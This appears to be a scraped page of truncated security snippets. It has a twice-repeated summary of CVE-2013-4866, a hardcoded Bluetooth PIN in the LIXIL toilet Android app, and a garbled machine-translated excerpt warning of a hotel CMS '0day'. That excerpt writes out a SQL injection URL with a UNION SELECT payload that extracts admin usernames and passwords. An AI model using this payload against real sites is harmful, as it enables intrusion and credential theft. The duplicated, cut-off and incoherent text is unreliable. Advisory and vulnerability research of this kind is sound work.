Hardcoded credentials

The LIXIL Corporation My SATIS Genius Toilet application for Android has a hardcoded Bluetooth PIN, which allows physically proximate attackers to trigger physical resource consumption water or heat or user discomfort...

CVE-2013-4866

The LIXIL Corporation My SATIS Genius Toilet application for Android has a hardcoded Bluetooth PIN, which allows physically proximate attackers to trigger physical resource consumption water or heat or user discomfort...

CVE-2013-4866

CVE-2013-4866 affects the LIXIL My SATIS Genius Toilet Android app and its Bluetooth interface. The Android app contains a hard-coded Bluetooth PIN (noted in public advisories as 0000), enabling physically proximate attackers to use the app to control the toilet and trigger resource consumption (...

A hotel CMS injection 0day-vulnerability warning-the black bar safety net

White-box in some sense, also TM is the individual force of life, the MVC framework let a person see uncomfortable. Test code: 1. http://www.xxx.com/index.php?m=liansuohotel&cityid=5 3%20and%2 0 1=2%20union%20select%2 0 1,concatusername,0x3a,password,3,4,5,6,7,8,9,1 0%20from%20zhunaadmin Copy the...